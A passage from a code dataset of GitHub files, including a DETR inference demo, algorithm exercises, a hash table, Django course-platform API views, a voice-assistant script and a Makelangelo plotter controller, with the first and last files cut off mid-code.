TaskHandleType.process_pool_executor:\n await __handle_tasks_process_pool_executor__(queue)\n return\n\n raise Exception('Invalid mode')\n\n\nif __name__ == \"__main__\":\n pass\n","repo_name":"pjc1991/py-image-storage","sub_path":"task_handler.py","file_name":"task_handler.py","file_ext":"py","file_size_in_byte":3178,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"7619400789","text":"import argparse\n\nimport numpy as np\nimport urllib\nimport cv2\nfrom opendr.perception.object_detection_2d import DetrLearner\nfrom opendr.perception.object_detection_2d.detr.algorithm.util.draw import draw\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--device\", help=\"Device to use (cpu, cuda)\", type=str, default=\"cuda\", choices=[\"cuda\", \"cpu\"])\n parser.add_argument(\"--backbone\", help=\"Backbone to use (resnet50, resnet101)\", type=str, default=\"resnet101\",\n choices=[\"resnet50\", \"resnet101\"])\n parser.add_argument(\"--panoptic-segmentation\", dest='panoptic_segmentation', help=\"Perform panoptic segmentation\",\n default=False, action='store_true')\n\n args = parser.parse_args()\n\n # Download an image\n url = 'http://images.cocodataset.org/val2017/000000039769.jpg'\n req = urllib.request.urlopen(url)\n arr = np.asarray(bytearray(req.read()), dtype=np.uint8)\n img = cv2.imdecode(arr, -1)\n\n # For panoptic segmentation, the number of classes is different\n if args.panoptic_segmentation:\n num_classes = 250\n else:\n num_classes = 91\n\n learner = DetrLearner(\n backbone=args.backbone,\n device=args.device,\n panoptic_segmentation=args.panoptic_segmentation,\n num_classes=num_classes,\n )\n learner.download()\n bounding_box_list = learner.infer(img)\n cv2.imshow('Detections', draw(img, bounding_box_list))\n cv2.waitKey(0)\n","repo_name":"opendr-eu/opendr","sub_path":"projects/python/perception/object_detection_2d/detr/inference_demo.py","file_name":"inference_demo.py","file_ext":"py","file_size_in_byte":1493,"program_lang":"python","lang":"en","doc_type":"code","stars":556,"dataset":"github-code","pt":"99"} +{"seq_id":"10586548769","text":"#Find the repeating and the missing\r\nimport math\r\ndef findNumbers(arr, n):\r\n\t\tsumN = (n * (n + 1)) / 2;\r\n\t\tsumSqN = (n * (n + 1) * (2 * n + 1)) / 6;\r\n\t\tsum = 0;\r\n\t\tsumSq = 0;\r\n\t\tfor i in range(0,n):\r\n\t\t\tsum = sum + arr[i];\r\n\t\t\tsumSq = sumSq + (math.pow(arr[i], 2));\r\n\t\tB = (((sumSq - sumSqN) / (sum - sumN)) + sumN - sum) / 2;\r\n\t\tA = sum - sumN + B\r\n\t\tprint(\"A = \",int(A))\r\n\t\tprint(\"B = \",int(B))\r\narr = [ 1, 2, 2, 3, 4, 5, 6 ]\r\nn = len(arr)\r\nfindNumbers(arr, n)","repo_name":"RishavMishraRM/DSA_Problems","sub_path":"Day_9/Find the repeating and the missing.py","file_name":"Find the repeating and the missing.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"73030143684","text":"#написать генератор фейковых личностей\n\n#Ввести из командной строки натуральное число и сгенерировать в файл 'people.xlsx' #таблицу с колонками:\n#Номер|Фамилия|Имя|Отчество\n\nfrom russian_names import RussianNames\nimport openpyxl\nnumber= input('Введите целое число: ')\n\ndef create_person(number):\n if number.isnumeric() and int(number) !=0:\n number_int=int(number)\n person=RussianNames(count=number_int,output_type='list').get_batch()\n # print(person) это добавляла для себя для наглядности\n 
person_list=list(person)\n # print(person_list) это добавляла для себя для наглядности\n wb = openpyxl.Workbook()\n ws = wb.active\n for i in person_list:\n ws.append(i)\n wb.save('vch.xlsx')\n print('Вы создали .xlsx таблицу')\n else:\n print('Вы ввели некорректное число')\n\n\ncreate_person(number)\n\n \n\n \n\n \n \n\n","repo_name":"hanenkotanya/Diplom","sub_path":"russian_names.py","file_name":"russian_names.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"26772795278","text":"# '''\n# Linked List hash table key/value pair\n# '''\nclass LinkedPair:\n def __init__(self, key, value):\n self.key = key\n self.value = value\n self.next = None\n\nclass HashTable:\n '''\n A hash table that with `capacity` buckets\n that accepts string keys\n '''\n def __init__(self, capacity):\n self.capacity = capacity # Number of buckets in the hash table\n self.storage = [None] * capacity\n\n\n def _hash(self, key):\n '''\n Hash an arbitrary key and return an integer.\n\n You may replace the Python hash with DJB2 as a stretch goal.\n '''\n return hash(key)\n\n\n def _hash_djb2(self, key):\n '''\n Hash an arbitrary key using DJB2 hash\n\n OPTIONAL STRETCH: Research and implement DJB2\n '''\n pass\n\n\n def _hash_mod(self, key):\n '''\n Take an arbitrary key and return a valid integer index\n within the storage capacity of the hash table.\n '''\n return self._hash(key) % self.capacity\n\n\n def insert(self, key, value):\n '''\n Store the value with the given key.\n\n Hash collisions should be handled with Linked List Chaining.\n\n Fill this in.\n ''' \n if self.storage[self._hash_mod(key)] is None:\n self.storage[self._hash_mod(key)] = LinkedPair(key, value)\n else:\n node = self.storage[self._hash_mod(key)]\n while node:\n if node.key is key:\n node.value = value\n break\n elif node.next is None:\n node.next = LinkedPair(key, value)\n break\n else:\n node = node.next\n\n def remove(self, key):\n '''\n Remove the value stored with the given key.\n\n Print a warning if the key is not found.\n\n Fill this in.\n '''\n\n ind = self._hash_mod(key)\n if not self.storage[ind]:\n print(\"Warning: the key is not found\")\n return\n \n node = self.storage[ind]\n previous_node = None\n while node:\n if node.key == key:\n if previous_node:\n previous_node.next = node.next\n break\n else:\n self.storage[ind] = node.next\n break\n elif node.next:\n previous_node = node\n node = node.next\n else:\n print(\"Warning: the key is not found\")\n return\n\n\n def retrieve(self, key):\n '''\n Retrieve the value stored with the given key.\n\n Returns None if the key is not found.\n\n Fill this in.\n '''\n \n if self.storage[self._hash_mod(key)] is None:\n return None\n else:\n node = self.storage[self._hash_mod(key)]\n while node:\n if node.key == key:\n return node.value\n elif node.next is None:\n return None\n else:\n node = node.next \n\n\n def resize(self):\n '''\n Doubles the capacity of the hash table and\n rehash all key/value pairs.\n\n Fill this in.\n '''\n temp_list = []\n for i in self.storage:\n node = i\n while node:\n temp_list.append([node.key, node.value])\n node = node.next\n self.capacity = 2*self.capacity\n self.storage = [None]*self.capacity\n for i in temp_list:\n self.insert(i[0], i[1])\n\n\n\nif __name__ == \"__main__\":\n ht = HashTable(2)\n\n ht.insert(\"line_1\", \"Tiny hash table\")\n ht.insert(\"line_2\", \"Filled beyond capacity\")\n ht.insert(\"line_3\", \"Linked list saves the day!\")\n\n 
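    # Illustrative addition (hypothetical, not in the original test script): with only
    # 2 buckets and 3 keys, at least two keys must map to the same bucket index, so the
    # LinkedPair chaining in insert()/retrieve() is what keeps every value reachable.
    for key in ("line_1", "line_2", "line_3"):
        print(key, "-> bucket", ht._hash_mod(key))

    # A key that was never inserted should come back as None rather than raising.
    print(ht.retrieve("line_4"))  # expected: None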
print(\"\")\n\n # Test storing beyond capacity\n print(ht.retrieve(\"line_1\"))\n print(ht.retrieve(\"line_2\"))\n print(ht.retrieve(\"line_3\"))\n\n # Test resizing\n old_capacity = len(ht.storage)\n ht.resize()\n new_capacity = len(ht.storage)\n\n print(f\"\\nResized from {old_capacity} to {new_capacity}.\\n\")\n\n # Test if data intact after resizing \n print(ht.retrieve(\"line_1\"))\n print(ht.retrieve(\"line_2\"))\n print(ht.retrieve(\"line_3\"))\n\n print(\"\")\n","repo_name":"mmthatch12/Hash-Tables","sub_path":"src/hashtable.py","file_name":"hashtable.py","file_ext":"py","file_size_in_byte":4306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"11823787396","text":"# coding: utf8\n\"\"\"\nMerge Two Sorted Arrays\n\nAn array A[1..n] is said to have a majority element if more than half of its entries are the same.\n\nGiven: A positive integer n≤10^5 and a sorted array A[1..n] of integers from −10^5 to 10^5, a positive integer m≤10^5 and a sorted array B[1..m] of integers from −10^5 to 10^5.\n\nReturn: A sorted array C[1..n+m] containing all the elements of A and B.\n\nSample Dataset\n 4\n 2 4 10 18\n 3\n -5 11 12\n\nSample Output\n -5 2 4 10 11 12 18\n \n Brute force sort - no merge!\n\"\"\"\n\ndef processData(inFileName):\n with open(inFileName) as datafile:\n datafile.readline()\n A = [int(x) for x in datafile.readline().strip().split(\" \")]\n datafile.readline()\n B = [int(x) for x in datafile.readline().strip().split(\" \")]\n return \" \".join(str(x) for x in sorted(A + B))\n\n\"\"\"\nPersonal observations : \n- Ewww! Simple, but yuck!\n\"\"\"\n \nassert processData('sample.txt') == '-5 2 4 10 11 12 18'\n\nwith open('results.txt', 'w') as resultsfile:\n result = processData('rosalind_mer.txt')\n resultsfile.write(str(result))\n\nwith open('results.txt', 'w') as resultsfile:\n result = processData('rosalind_mer_1_dataset.txt')\n resultsfile.write(str(result))\n\nprint('done')","repo_name":"maccergit/Rosalind","sub_path":"Algorithmic Heights - MER/MER/003.py","file_name":"003.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"24086730725","text":"import requests\nimport re\n\ndef get_info():\n r = requests.get('https://habr.com/')\n return r.text\n\n\nif __name__ == '__main__':\n text = get_info()\n\n name_pattern = '\"https:.*/\"'\n links = re.findall(name_pattern, text)\n print(len(links))\n for item in links:\n print(item + '\\n')","repo_name":"foxrec123/Python","sub_path":"9/reg_express.py","file_name":"reg_express.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"31526560516","text":"import torch\n\n\n# code from here:\n# https://colab.research.google.com/github/facebookresearch/moco/blob/colab-notebook/colab/moco_cifar10_demo.ipynb\n#\n# knn monitor as in InstDisc https://arxiv.org/abs/1805.01978\n# implementation follows http://github.com/zhirongw/lemniscate.pytorch and https://github.com/leftthomas/SimCLR\n\ndef knn_predict(feature, feature_bank, feature_labels, classes: int, knn_k: int, knn_t: float):\n \"\"\"Helper method to run kNN predictions on features based on a feature bank\n\n Args:\n feature: Tensor of shape [N, D] consisting of N D-dimensional features\n feature_bank: Tensor of a database of features used for kNN\n feature_labels: Labels for the features in our feature_bank\n classes: Number of 
classes (e.g. 10 for CIFAR-10)\n knn_k: Number of k neighbors used for kNN\n knn_t: \n\n \"\"\"\n\n # compute cos similarity between each feature vector and feature bank ---> [B, N]\n sim_matrix = torch.mm(feature, feature_bank)\n # [B, K]\n sim_weight, sim_indices = sim_matrix.topk(k=knn_k, dim=-1)\n # [B, K]\n sim_labels = torch.gather(feature_labels.expand(feature.size(0), -1), dim=-1, index=sim_indices)\n\n # we do a reweighting of the similarities \n sim_weight = (sim_weight / knn_t).exp()\n\n # counts for each class\n one_hot_label = torch.zeros(feature.size(0) * knn_k, classes, device=sim_labels.device)\n # [B*K, C]\n one_hot_label = one_hot_label.scatter(dim=-1, index=sim_labels.view(-1, 1), value=1.0)\n # weighted score ---> [B, C]\n pred_scores = torch.sum(one_hot_label.view(feature.size(0), -1, classes) * sim_weight.unsqueeze(dim=-1), dim=1)\n\n pred_labels = pred_scores.argsort(dim=-1, descending=True)\n\n return pred_labels","repo_name":"huang-research-group/contrastive2021","sub_path":"src/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1741,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"99"} +{"seq_id":"26531903014","text":"'''Instructions\nGiven a 2D matrix matrix, handle multiple queries of the following type:\n\nCalculate the sum of the elements of matrix inside the rectangle defined by its upper left corner (row1, col1) and lower right corner (row2, col2).\nImplement the NumMatrix class:\n\nNumMatrix(int[][] matrix) Initializes the object with the integer matrix matrix.\nint sumRegion(int row1, int col1, int row2, int col2) Returns the sum of the elements of matrix inside the rectangle defined by its upper left corner (row1, col1) and lower right corner (row2, col2).\n'''\n'''Examples\nInput\n[\"NumMatrix\", \"sumRegion\", \"sumRegion\", \"sumRegion\"]\n[[[[3, 0, 1, 4, 2], [5, 6, 3, 2, 1], [1, 2, 0, 1, 5], [4, 1, 0, 1, 7], [1, 0, 3, 0, 5]]], [2, 1, 4, 3], [1, 1, 2, 2], [1, 2, 2, 4]]\nOutput\n[null, 8, 11, 12]\n\nExplanation\nNumMatrix numMatrix = new NumMatrix([[3, 0, 1, 4, 2], [5, 6, 3, 2, 1], [1, 2, 0, 1, 5], [4, 1, 0, 1, 7], [1, 0, 3, 0, 5]]);\nnumMatrix.sumRegion(2, 1, 4, 3); // return 8 (i.e sum of the red rectangle)\nnumMatrix.sumRegion(1, 1, 2, 2); // return 11 (i.e sum of the green rectangle)\nnumMatrix.sumRegion(1, 2, 2, 4); // return 12 (i.e sum of the blue rectangle)\n'''\n'''Thoughts\n1. For init loop through matrix\n2. For every list in matrix loop through it\n3. For every element add the total of everything in this list until this elemtn to a list\n4. For sumRegion get sums from row1 to row2\n5. loop through the current list minus sums[col1] from sums[col2+1] and add it to the total\n6. 
Return total\n'''\n\nclass NumMatrix:\n def __init__(self, matrix: list[list[int]]) -> None:\n r, c = len(matrix), len(matrix[0])\n sums = [[0 for _ in range(c+1)] for _ in range(r)]\n for i in range(r):\n for j in range(c):\n sums[i][j+1] = sums[i][j] + matrix[i][j]\n self.sums = sums\n \n\n def sumRegion(self, row1, col1, row2, col2):\n out = 0\n current = self.sums[row1:row2+1]\n for l in current:\n out += l[col2+1] - l[col1]\n return out\n\n # def __init__(self, matrix: list[list[int]]) -> None:\n # self.matrix = matrix\n\n # def sumRegion(self, row1, col1, row2, col2):\n # out = 0\n # current = self.matrix[row1:row2+1]\n # for i in range(len(current)):\n # current[i] = current[i][col1:col2+1]\n # out += sum(current[i])\n # return out\n\n # def sumRegion(self, row1, col1, row2, col2):\n # out = 0\n # current = self.matrix[row1:row2+1]\n \n # r, c = len(current), len(current[0])\n # sums = [[0 for _ in range(c+1)] for _ in range(r)]\n\n # for i in range(r):\n # for j in range(col2+1):\n # sums[i][j+1] = sums[i][j] + current[i][j]\n # out += sums[i][col2+1] - sums[i][col1]\n # return out\n","repo_name":"RL419/computer-science","sub_path":"June Problems/RangeSumQuery2D.py","file_name":"RangeSumQuery2D.py","file_ext":"py","file_size_in_byte":2793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"44181232471","text":"from fastapi import HTTPException, status\n\n\nclass ClaimTypeNotSupportedError(HTTPException):\n \"\"\"Raises internally when claim type is wrong.\"\"\"\n\n def __init__(self, claim_type: str):\n super().__init__(\n status_code=status.HTTP_500_INTERNAL_SERVER_ERROR,\n detail=f\"Claim type '{claim_type}' is not supported\",\n )\n","repo_name":"Skogstomten/produce-exchange-hub","sub_path":"api/app/authentication/errors/claim_type_not_supported_error.py","file_name":"claim_type_not_supported_error.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"28674151834","text":"import pyttsx3\r\nimport datetime\r\nimport speech_recognition as sr\r\nimport wikipedia\r\nimport webbrowser\r\nimport os\r\nimport smtplib\r\n\r\n\r\nengine=pyttsx3.init('sapi5')\r\nvoices=engine.getProperty('voices')\r\n#print(voices[0].id)\r\nengine.setProperty('voice',voices[0].id)\r\n\r\ndef speak(audio):\r\n engine.say(audio)\r\n engine.runAndWait()\r\ndef WishMe():\r\n hour=int(datetime.datetime.now().hour)\r\n if hour>=0 and hour<=12:\r\n speak(\"goodmorning..!\")\r\n elif hour>=12 and hour<=18:\r\n speak(\"goodafternoon..!\")\r\n else :\r\n speak (\"good evening\")\r\n speak(\"hey this is aarv ! 
how may i help you sir\")\r\ndef takecommand():\r\n r=sr.Recognizer()\r\n with sr.Microphone() as source:\r\n print (\"listening....\")\r\n r.pause_threshold=1\r\n audio=r.listen(source)\r\n try:\r\n print(\"recognizing....\")\r\n query=r.recognize_google(audio,language='en-in')\r\n print(f\"user said:{query}\\n\")\r\n except Exception as e:\r\n #print(e)\r\n print('say it again please.....')\r\n return \"None\"\r\n return query\r\ndef sendEmail(to,content):\r\n server=smtplib.SMTP('smtp.gmail.com',587)\r\n server.ehlo()\r\n server.starttls()\r\n server.login(\"rr9002575@gmail.com\",'*******')\r\n server.sendmail(\"rr9002575@gmail.com\",to,content)\r\n server.close()\r\n \r\n\r\nif __name__ == \"__main__\":\r\n#speak(\"hey guys...!this is python freak.........plz do follow\")\r\n WishMe()\r\n while True:\r\n#speak(\"yeah\")\r\n query = takecommand().lower()\r\n#logic for executing task \r\n if 'wikipedia' in query:\r\n speak('searching wikipedia.....')\r\n query=query.replace(\"wikipedia\",\"\")\r\n results=wikipedia.summary(query,sentences=2)\r\n speak(\"according to wikipedia\")\r\n speak(results)\r\n print(results)\r\n break\r\n \r\n elif 'open youtube' in query :\r\n webbrowser.open('youtube.com')\r\n break\r\n elif 'open google' in query :\r\n webbrowser.open('google.com')\r\n break\r\n elif 'stackoverflow' in query :\r\n webbrowser.open('stackoverflow.com')\r\n break\r\n elif 'open gmail' in query :\r\n webbrowser.open('gmail.com')\r\n break\r\n elif 'open gaana' in query :\r\n webbrowser.open('gaana.com')\r\n break\r\n elif 'open spotify' in query :\r\n webbrowser.open('spotify.com')\r\n break\r\n elif 'who are you' in query:\r\n print(\"i am aarv..!how may i help you sir\")\r\n speak('i am aarv..!how may i help you sir')\r\n break\r\n elif 'play song' in query :\r\n music_dir='C:\\\\Users\\\\rr900\\\\Music\\\\New folder'\r\n songs=os.listdir(music_dir)\r\n os.startfile(os.path.join(music_dir,songs[0]))\r\n break\r\n elif 'the time' in query:\r\n strTime=datetime.datetime.now().strftime(\"%H:%M:%S\")\r\n speak(f\"sir,the time is : {strTime}\") \r\n break \r\n elif 'open code' in query:\r\n codePath=\"C:\\\\Users\\\\rr900\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe\"\r\n os.startfile(codePath) \r\n break\r\n elif 'email to rahul' in query:\r\n try:\r\n speak(\"what should i say ?\")\r\n print(\"what should i say ?\")\r\n content=takecommand()\r\n to =('rr9002575@gmail.com')\r\n sendEmail(to,content)\r\n print(\"email has been sent\")\r\n speak(\"email has been sent\")\r\n \r\n except Exception as e:\r\n print(e)\r\n speak(\"fail to sent\")\r\n break\r\n","repo_name":"suman-2110/dekstop-AI","sub_path":"jarvish.py","file_name":"jarvish.py","file_ext":"py","file_size_in_byte":3717,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"39584038565","text":"import math\n\nfrom django.contrib.postgres.search import (SearchVector, TrigramSimilarity,\n TrigramWordSimilarity)\nfrom django.core.paginator import Paginator\nfrom django.db.models.functions import Greatest\nfrom moviepy.editor import VideoFileClip\nfrom rest_framework import status\n# from .pagination import PaginationHandlerMixin\nfrom rest_framework.pagination import PageNumberPagination\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\n\nfrom base.api.serializers import *\nfrom base.models import *\n\nfrom .filters import CourseFilter\nfrom .models import 
*\nfrom .rating import calculate_weighted_rating\nfrom .serializers import *\n\n\nclass Category_view(APIView):\n permission_classes = [\n IsAuthenticated,\n ]\n\n def put(self, request):\n email = request.user.email\n user = NewUserRegistration.objects.get(email__iexact=email)\n serializer = catSerializer(data=request.data)\n\n if serializer.is_valid():\n for i in range(11):\n s = \"Interest\" + str(i + 1)\n if serializer.data[s] == True:\n gettingCategory = interests.objects.get(id=i + 1)\n user.interested.add(gettingCategory)\n else:\n return Response(\n {\"msg\": \"Invalid Entry\"}, status=status.HTTP_400_BAD_REQUEST\n )\n\n serializer = profileSerializer(user, many=False)\n\n return Response(serializer.data)\n\n def get(self, request):\n categories = interests.objects.all()\n serializer = categorySerializer(categories, many=True)\n\n return Response(serializer.data)\n\n\nclass Course_view(APIView):\n def get(self, request):\n data = Course.objects.all()\n data = Course.objects.order_by(\"-weighted_rating\")\n serializer = TopicSerializer(data, many=True)\n return Response(serializer.data)\n\n permission_classes = [\n IsAuthenticated,\n ]\n\n def post(self, request):\n email = request.user.email\n user = NewUserRegistration.objects.get(email__iexact=email)\n if user.is_educator == True:\n all_courses = Course.objects.filter(educator_mail=request.user.id)\n total_weighted_rating = 0.0\n for each_course in all_courses:\n total_weighted_rating += each_course.weighted_rating\n if len(all_courses) == 0:\n avg_weighted_rating = 0\n else:\n avg_weighted_rating = total_weighted_rating / len(all_courses)\n user.educator_rating = avg_weighted_rating\n user.save()\n if avg_weighted_rating >= 2.5:\n user.is_certified_educator = True\n user.save()\n request.POST._mutable = True\n request.data[\"educator_mail\"] = request.user.id\n request.data[\"educator_name\"] = user.name\n request.POST._mutable = False\n serializer = TopicSerializer(data=request.data)\n if serializer.is_valid(raise_exception=True):\n serializer.save()\n return Response(serializer.data)\n else:\n user.is_certified_educator = False\n user.save()\n request.POST._mutable = True\n request.data[\"educator_mail\"] = request.user.id\n request.data[\"educator_name\"] = user.name\n request.data[\"price\"] = 0\n request.POST._mutable = False\n serializer = TopicSerializer(data=request.data)\n if serializer.is_valid(raise_exception=True):\n serializer.save()\n return Response(serializer.data)\n else:\n return Response({\"msg\": \"user is not an educator\"})\n\n\nclass View_filtered_courses(APIView):\n permission_classes = [\n IsAuthenticated,\n ]\n serializer_class = TopicSerializer\n\n def get(self, request):\n email = request.user.email\n user = NewUserRegistration.objects.get(email__iexact=email)\n user_interested_courses = user.interested.all()\n courses = Course.objects.filter(category__in=user_interested_courses)\n\n courses = Course.objects.order_by(\"-weighted_rating\")\n paginator = PageNumberPagination()\n page = paginator.paginate_queryset(courses, request=request)\n if page is not None:\n serializer = paginator.get_paginated_response(\n self.serializer_class(page, many=True).data\n )\n else:\n serializer = self.serializer_class(courses, many=True)\n\n return Response(serializer.data)\n\n\nclass Course_rating(APIView):\n permission_classes = [\n IsAuthenticated,\n ]\n\n def post(self, request):\n email = request.user.email\n user = NewUserRegistration.objects.get(email__iexact=email)\n check_status = 0\n history = 
feedbackmodel.objects.filter(\n user=user.name, course=request.data.get(\"course\")\n )\n if len(history) != 0:\n check_status = 1\n history.delete()\n request.POST._mutable = True\n request.data[\"sender\"] = user.id\n request.data[\"user\"] = user.name\n request.POST._mutable = False\n seri = GetRatingSerializer(data=request.data)\n if seri.is_valid(raise_exception=True):\n # ck = feedbackmodel.objects.latest('time')\n course_id = request.data.get(\"course\")\n course = Course.objects.get(id=course_id)\n count = course.review_count\n rating = course.rating\n seri.save()\n rating_serializer = RatingSerializer(instance=course, data=request.data)\n if rating_serializer.is_valid(raise_exception=True):\n rating_serializer.save()\n review = course.latest_review\n # return Response(check)\n if count == 0:\n rating_serializer = RatingSerializer(\n instance=course, data=request.data\n )\n if rating_serializer.is_valid(raise_exception=True):\n course.rating = review\n course.review_count = 1\n course.weighted_rating = calculate_weighted_rating(course)\n rating_serializer.save()\n if check_status == 0:\n return Response({\"msg\": \"Thanks for your review\"})\n if check_status == 1:\n return Response(\n {\"msg\": \"Review edited: Thanks for your review\"}\n )\n else:\n present_rating = rating * count\n new_rating = (present_rating + review) / (count + 1)\n if check_status == 0:\n count += 1\n course.review_count = count\n rating_serializer = RatingSerializer(\n instance=course, data=request.data\n )\n if rating_serializer.is_valid(raise_exception=True):\n course.rating = new_rating\n course.weighted_rating = calculate_weighted_rating(course)\n rating_serializer.save()\n if check_status == 0:\n return Response({\"msg\": \"Thanks for your review\"})\n if check_status == 1:\n return Response(\n {\"msg\": \"Review edited: Thanks for your review\"}\n )\n return Response({\"msg\": \"Something went wrong\"})\n # rating_serializer = RatingSerializer(instance = course,data=request.data)\n # if rating_serializer.is_valid(raise_exception=True):\n # rating_serializer.save()\n # return Response(rating)\n return Response({\"msg\": \"enter valid details\"})\n\n def get(self, request, ck):\n email = request.user.email\n user = NewUserRegistration.objects.get(email__iexact=email)\n feedback = feedbackmodel.objects.filter(course=ck, sender=request.user.id)\n if len(feedback) == 0:\n return Response({\"msg\": \"Not rated\"}, status=status.HTTP_400_BAD_REQUEST)\n feedback_serializer = GetRatingSerializer(instance=feedback, many=True)\n return Response(feedback_serializer.data)\n\n\nclass Searching(APIView):\n def get(self, request):\n queryset = Course.objects.all()\n my_filter = CourseFilter(request.GET, queryset=queryset)\n queryset = my_filter.qs\n\n search_result = request.GET.get(\"search-area\") or \"\"\n if search_result:\n queryset = (\n queryset.annotate(\n similarity=Greatest(\n TrigramWordSimilarity(search_result, \"topic\"),\n TrigramWordSimilarity(search_result, \"educator_name\"),\n )\n )\n .filter(similarity__gt=0.30)\n .order_by(\"-similarity\")\n )\n\n serializer = TopicSerializer(queryset, many=True)\n\n if serializer.data == []:\n return Response(\n {\"msg\": \"Nothing Found\"}, status=status.HTTP_400_BAD_REQUEST\n )\n\n return Response(serializer.data)\n\n\nclass Purchased_courses(APIView):\n permission_classes = [\n IsAuthenticated,\n ]\n\n def get(self, request):\n email = request.user.email\n user = NewUserRegistration.objects.get(email__iexact=email)\n array = user.purchasedCourse.all()\n 
courses = Course.objects.filter(id__in=array)\n topic_serializer = TopicSerializer(courses, many=True)\n return Response(topic_serializer.data)\n\n\nclass Lesson_view(APIView):\n permission_classes = [\n IsAuthenticated,\n ]\n\n def get(self, request):\n lesson = lessons.objects.all()\n serializer = lessonSerializer(lesson, many=True)\n\n return Response(serializer.data)\n\n def post(self, request):\n email = request.user.email\n user = NewUserRegistration.objects.get(email__iexact=email)\n topic = request.data.get(\"topic\")\n course = Course.objects.get(id=topic)\n\n if str(course.educator_mail) != str(email):\n return Response({\"msg\": \"invalid\"})\n\n try:\n if user.is_educator == True:\n request.POST._mutable = True\n request.data[\"topic\"] = topic\n request.POST._mutable = False\n serializer = lessonSerializer(data=request.data)\n if serializer.is_valid(raise_exception=True):\n serializer.save()\n\n return Response({\"msg\": \"lesson added\"})\n return Response({\"msg\": \"user is not an educator\"})\n except:\n return Response({\"msg\": \"invalid\"}, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass View_specific_course_lesson(APIView):\n def post(self, request):\n try:\n topic = request.data.get(\"topic\")\n lesson = lessons.objects.filter(topic=topic)\n serializer = lessonSerializer(lesson, many=True)\n if serializer.data == []:\n return Response(\n {\"msg\": \"No such course exists\"}, status=status.HTTP_400_BAD_REQUEST\n )\n return Response(serializer.data)\n except:\n return Response(\n {\"msg\": \"Enter a valid course\"}, status=status.HTTP_400_BAD_REQUEST\n )\n\n\nclass Course_feedback(APIView):\n def get(self, request, ck):\n course = feedbackmodel.objects.filter(course=ck)\n rating_serializer = GetRatingSerializer(instance=course, many=True)\n return Response(rating_serializer.data)\n","repo_name":"ClawedCatalyst/SkillEdge-Backend","sub_path":"courses/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":12020,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"12186985790","text":"from dataclasses import dataclass\nimport logging\nfrom typing import Optional, Union\nimport time\n\nimport serial\n\nfrom gcode_robot.common import Point\nfrom gcode_robot.utils import gcode_reader\nfrom gcode_robot.gcode import GCodeLine, GCodeStatement\n\nlogger = logging.getLogger(__name__)\n\n\nclass MakelangoleRobot:\n IDLE_BYTES = b'> \\n'\n\n @dataclass\n class Settings:\n # General settings\n motor_width_mm: float = 500\n speed_idle: float = 30\n\n # Servo settings\n speed_draw: float = 20\n speed_pen_lift: float = 50\n\n angle_pen_up: float = 90\n angle_pen_down: float = 160\n\n def __init__(self, port: str, baudrate=57600,\n settings: Optional['MakelangoleRobot.Settings'] = None):\n self._serial = serial.Serial()\n self._serial.port = port\n self._serial.baudrate = baudrate\n self._current_settings = settings\n self._home = Point(0, 0)\n\n def _wait_for_idle(self):\n _t = time.time()\n ret = self._serial.read_until(self.IDLE_BYTES)\n logger.debug('Spent {:.2f} ms waiting for idle'.format(time.time() - _t))\n return ret\n\n def _wait_read(self):\n msg = b''\n while not msg:\n msg = self._serial.readline()\n # time.sleep(0.1)\n msg += self._serial.read_until(self.IDLE_BYTES)\n return msg.rstrip(self.IDLE_BYTES)\n\n def _send_gcode(self, line: Union[str, bytes, GCodeLine, GCodeStatement]):\n if isinstance(line, GCodeLine):\n line = line.statement\n if isinstance(line, GCodeStatement):\n line = str(line)\n if 
type(line) is str:\n line = line.encode()\n if line is None:\n return\n\n if not line.endswith(b'\\n'):\n line += b'\\n'\n\n logger.debug('Sending: {}'.format(line))\n self._serial.write(line)\n\n def init_connection(self):\n if not self._serial.is_open:\n self._serial.open()\n\n welcome_msg = self._wait_read()\n logger.info('Receive welcome message: {}'.format(welcome_msg.decode()))\n\n self.apply_settings()\n\n def apply_settings(self,\n settings: Optional['MakelangoleRobot.Settings'] = None):\n if settings:\n self._current_settings = settings\n\n s = self._current_settings\n if s is None:\n raise\n\n # Report current firmware version\n self._send_gcode('D5')\n logger.debug('Received: {}'.format(self._wait_read()))\n\n # Report all settings\n self._send_gcode('M503')\n logger.debug('Received: {}'.format(self._wait_read()))\n\n self._send_gcode('M17')\n logger.debug('Received: {}'.format(self._wait_read()))\n\n # Change axis A limits to max T and min B\n half_width = self._current_settings.motor_width_mm / 2\n self._send_gcode(f'M101 A0 T{half_width} B{-half_width}')\n self._send_gcode('M101 A1 T464 B-464')\n self._send_gcode('M101 A2 T170 B90')\n\n # TODO Allow home to be configured\n self.make_home(Point(0, -472))\n\n self._send_gcode('M17')\n logger.debug('Received: {}'.format(self._wait_read()))\n\n # Set initial feed rate\n self._send_gcode(f'G00 X0 F{s.speed_idle}')\n logger.debug('Received: {}'.format(self._wait_read()))\n\n def set_home(self, p: Point):\n # Set home\n self._send_gcode(f'D6 {p.gcode}')\n self._home = p\n logger.debug('Received: {}'.format(self._wait_read()))\n\n def 